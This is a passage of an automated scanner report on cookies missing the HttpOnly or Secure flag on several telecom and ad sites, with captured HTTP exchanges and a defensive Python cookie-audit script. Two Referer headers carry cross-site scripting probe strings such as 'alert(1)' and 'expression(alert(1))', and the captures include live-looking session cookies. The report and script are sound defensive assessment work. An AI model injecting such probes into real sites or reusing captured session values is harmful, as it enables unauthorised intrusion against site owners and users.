Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...

10.118. http://www.burstnet.com/enlightn/8117/3E06/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117/3E06/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: 56Q8, CMS, CMP. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that the value of 56Q8 is copied verbatim from the 01AD query parameter of the request and scoped to domain=.www.burstnet.com, so the client chooses that cookie's content; review how the server consumes it.

Request

GET /enlightn/8117/3E06/?01AD=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA&01RI=F72DD362342178E&01NA= HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: TID=174q04v1muc3qi; CMP=1AF.1GYo^19q.1GYo; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 06 Sep 2011 12:55:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; expires=Tue, 04-Oct-2011 12:55:53 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1GYo^19q.1Gbq; path=/; expires=Thu, 06-Sep-2012 12:55:52 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;
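The findings above all come from the same check (a Set-Cookie header without the HttpOnly attribute), and 10.118 additionally shows a cookie whose value is copied from a query parameter. The following script is an added example, not code from the XSS.Cx report or from any of the sites it covers: it parses captured request/response pairs like the ones shown, flags every Set-Cookie that lacks HttpOnly (and Secure, when the exchange was over HTTPS), applies a name heuristic in the spirit of the scanner's "does not appear to contain a session token" judgement, and reports cookie values that echo a request parameter. The sample exchanges are constructed and trimmed from findings 10.114 and 10.118, plus an HttpOnly cookie modelled on the _frontiertv_session cookie in 10.129 with a placeholder value; SESSION_HINTS and the triage labels returned by rate() are this example's own assumptions.

```python
"""Audit Set-Cookie headers in captured HTTP exchanges for missing HttpOnly/Secure flags.

Added example, not code from the original report or from any site it covers.
The sample exchanges are constructed (trimmed) from findings 10.114, 10.118 and 10.129;
SESSION_HINTS and the triage labels returned by rate() are this example's own assumptions.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Heuristic only: substrings of cookie names that usually carry an authenticated session.
SESSION_HINTS = ("sess", "sid", "token", "auth", "login")


def split_message(raw):
    """Return (start_line, [(header, value), ...]) for one raw HTTP request or response."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    headers = [tuple(s.strip() for s in ln.split(":", 1)) for ln in lines[1:] if ":" in ln]
    return lines[0], headers


def parse_set_cookie(value):
    """Split a Set-Cookie value into (name, value, {attribute: value}); bare flags map to ''."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            k, _, v = part.partition("=")
            attrs[k.strip().lower()] = v.strip()
    return name.strip(), cookie_value, attrs


def audit(request_raw, response_raw):
    """One finding dict per Set-Cookie in the response, cross-checked against the request."""
    request_line, _ = split_message(request_raw)
    _, response_headers = split_message(response_raw)
    target = request_line.split(" ")[1] if " " in request_line else ""
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    findings = []
    for header, value in response_headers:
        if header.lower() != "set-cookie":
            continue
        name, cookie_value, attrs = parse_set_cookie(value)
        findings.append({
            "name": name,
            "httponly": "httponly" in attrs,
            "secure": "secure" in attrs,
            "session_like": any(h in name.lower() for h in SESSION_HINTS),
            # Query parameters whose value was copied verbatim into the cookie (10.118: 01AD -> 56Q8).
            "echoes_param": [p for p, pv in params.items() if pv and pv == cookie_value],
        })
    return findings


def rate(finding, is_https=False):
    """Triage label for one finding."""
    if finding["echoes_param"]:
        return "review"       # the client chose the cookie's value; check how the server uses it
    if not finding["httponly"] and finding["session_like"]:
        return "low"          # script-readable cookie that looks like session material
    if not finding["httponly"] or (is_https and not finding["secure"]):
        return "information"  # the scanner's own rating for non-session cookies
    return "ok"


def describe(findings):
    """The scanner's issue-detail sentence, with the cookie names the report left out."""
    names = [f["name"] for f in findings if not f["httponly"]]
    if not names:
        return "All cookies in this response set the HttpOnly flag."
    many = len(names) > 1
    return "The following cookie%s issued by the application and %s not have the HttpOnly flag set: %s." % (
        "s were" if many else " was", "do" if many else "does", ", ".join(names))


# Constructed samples, cut down to the headers that matter.
REQ_APTELA = "GET /mainstylesheet.css/ HTTP/1.1\nHost: www.aptela.com\n\n"
RESP_APTELA = """HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
"""
REQ_BURST = ("GET /enlightn/8117/3E06/?01AD=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA"
             "&01RI=F72DD362342178E&01NA= HTTP/1.1\nHost: www.burstnet.com\n\n")
RESP_BURST = """HTTP/1.1 200 OK
Content-Type: image/gif
Set-Cookie: 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; expires=Tue, 04-Oct-2011 12:55:53 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1GYo^19q.1Gbq; path=/; expires=Thu, 06-Sep-2012 12:55:52 GMT; domain=.burstnet.com

GIF89a
"""
REQ_MYFITV = "GET / HTTP/1.1\nHost: www.myfitv.com\n\n"
RESP_MYFITV = """HTTP/1.1 200 OK
Set-Cookie: _frontiertv_session=CONSTRUCTED_SESSION_VALUE; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/

<!DOCTYPE html>
"""

if __name__ == "__main__":
    for req, resp in ((REQ_APTELA, RESP_APTELA), (REQ_BURST, RESP_BURST), (REQ_MYFITV, RESP_MYFITV)):
        found = audit(req, resp)
        print(describe(found))
        for f in found:
            print("  %-22s httponly=%-5s secure=%-5s echoes=%-8s %s" % (
                f["name"], f["httponly"], f["secure"], ",".join(f["echoes_param"]) or "-", rate(f)))
```

Running the script prints one issue-detail sentence per exchange followed by a per-cookie line; replace the sample strings with your own proxy captures (the raw request and response text, headers first) to audit other hosts. The name heuristic is deliberately coarse: a cookie such as UserID or SC in findings 10.121 and 10.122 would not match it, which is exactly why the scanner's "review the contents of the cookie" advice still applies.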

10.119. http://www.comcast.com/includes/js/CookieHelper.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /includes/js/CookieHelper.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerpool_comcastcom_VIP1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. BIGipServer* cookies are F5 BIG-IP persistence cookies; their value encodes the internal address and port of the back-end pool member rather than any session state.

Request

GET /includes/js/CookieHelper.js HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Aug 2011 16:28:54 GMT
Accept-Ranges: bytes
ETag: "0e724edc59cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 11:50:37 GMT
Connection: close
Content-Length: 6348
Set-Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; path=/

function getCookieVal(sName)
{
   var val = "";
   var nIndex = document.cookie.indexOf(sName);
   if (nIndex != -1)
   {
       // move past the equal sign
       var nStart = nIndex + sName.length + 1;
       
       
...[SNIP]...

10.120. http://www.comcast.com/includes/omniture/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /includes/omniture/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerpool_comcastcom_VIP1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/omniture/s_code.js HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 27 May 2011 18:16:50 GMT
Accept-Ranges: bytes
ETag: "055553f9a1ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 11:50:37 GMT
Connection: close
Content-Length: 66775
Set-Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; path=/

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
var s
...[SNIP]...

10.121. https://www.comcast.com/Localization/Localize.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The response was served over HTTPS, yet the cookie is also issued without the Secure flag and with domain=comcast.com, so browsers will send it to every comcast.com host, including over plain HTTP; its value carries the same RC.USID identifier that the request already presented.

Request

GET /Localization/Localize.cspx?Referer=%2FShop%2FBuyFlow2%2Fproducts.cspx&SourcePage=Bundled&FormName=AddressOrZipCode&StreetName=&AptNumber=&Zip= HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331733|PC#1315327839174-766376.19#1316539473|check#true#1315329933; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331673649%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520custcare%2520%7C1315331673661%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":6,"lc":{"d0":{"v":6,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 24713
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; domain=comcast.com; path=/
Date: Tue, 06 Sep 2011 12:24:44 GMT
Connection: Keep-Alive
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...

10.122. https://www.comcast.com/includes/js/IDGenerator.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /includes/js/IDGenerator.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UserID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. UserID is a GUID with a far-future expiry (31-Dec-9999) that matches the UCID cookie in the request, and it is issued over HTTPS without the Secure flag; confirm that the server does not rely on it to identify the user.

Request

GET /includes/js/IDGenerator.ashx HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B; fsr.a=1315328362332

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Expires: Tue, 06 Sep 2011 11:58:21 GMT
Content-Length: 0


10.123. http://www.fairpoint.com/residential/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /residential/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: activeBU. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residential/ HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0; __utma=35652279.1641746484.1315328322.1315328322.1315328322.1; __utmc=35652279; __utmz=35652279.1315328322.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fp_audience=residential; fp_state=VT; fp_city=Westfield; newloc=1; fp_zip=05874; fp_telco=NNE-VT

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Set-Cookie: activeBU=Residential; Expires=Tue, 06-Sep-2011 14:10:45 GMT; Path=/
Content-Type: text/html
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<link re
...[SNIP]...

10.124. http://www.fairpoint.com/servlet/CityTelcoMappingServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /servlet/CityTelcoMappingServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: fp_state, fp_city, newloc. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /servlet/CityTelcoMappingServlet HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
Content-Length: 9
Origin: http://www.fairpoint.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0; __utma=35652279.1641746484.1315328322.1315328322.1315328322.1; __utmc=35652279; __utmz=35652279.1315328322.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fp_audience=residential

zip=05874

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Set-Cookie: fp_state=VT; Expires=Wed, 05-Sep-2012 13:10:44 GMT; Path=/
Set-Cookie: fp_city=Westfield; Expires=Wed, 05-Sep-2012 13:10:44 GMT; Path=/
Set-Cookie: newloc=1; Expires=Wed, 05-Sep-2012 13:10:44 GMT; Path=/
Content-Length: 0
Content-Type: text/plain


10.125. http://www.frontier.com/Js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Its value embeds an internal address (10.160.118.20), which is characteristic of a load-balancer persistence cookie rather than a session token.

Request

GET /Js/s_code.js HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; expires=Thu, 6-Sep-2012 11:50:33 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:37 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

10.126. http://www.frontierpages.com/SelectRegion.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /SelectRegion.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: FrontierPages. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Its value (uState=TX&uCity=Dallas) is built directly from the uState and uCity query parameters of the request.

Request

GET /SelectRegion.asp?uCity=Dallas&uState=TX&uG=1 HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 12:43:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.FrontierPages.com
Content-Length: 149
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:42:33 GMT
Set-Cookie: FrontierPages=uState=TX&uCity=Dallas; expires=Thu, 06-Oct-2011 04:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.FrontierPages.com">here</a>.</body>

10.127. http://www.frontierpages.com/scripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /scripts/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.frontierpages.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://yp.frontierpages.com/results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57%22style%3d%22x%3aexpression(alert(1))%22d9518141ec5&city=Dallas&state=TX&zip=

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da947bCMYKY; expires=Thu, 6-Sep-2012 12:56:23 GMT; path=/
Content-Length: 17665
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Mar 2010 15:00:18 GMT
Accept-Ranges: bytes
ETag: "0ed9e84fb9ca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:56:30 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

//Dev
//var s_account="cznquapages"

//Prod
var s_account="cznpages"
...[SNIP]...

10.128. http://www.googleadservices.com/pagead/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Conversion. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The cookie is scoped to path=/pagead/conversion/979457944/, so it is only sent back to that conversion-tracking path.

Request

GET /pagead/aclk?sa=L&ai=Cjmhv_whmToXXMKW0iAKGpdSMD6Dcv68CuPKl7DbmkvXnCQgAEAMoA1C_8LGh______8BYMme_obIo_waoAGYr4XTA8gBAaoEGk_QmetTV29NLOMpW9E7vyyfzeTAfEwS1dx4&ved=0CBIQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgiYlYRdTOTzRSABKAAw88uL57LFh-j1ATjy4fjyBEDViJXzBA&sig=AOD64_0ouNLDusjNPLpheBk3aPINK1Ws6w&adurl=http://shop.comcast.com/XFINITY/voice/%3FCMP%3DKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136%26iq_id%3D34270410 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
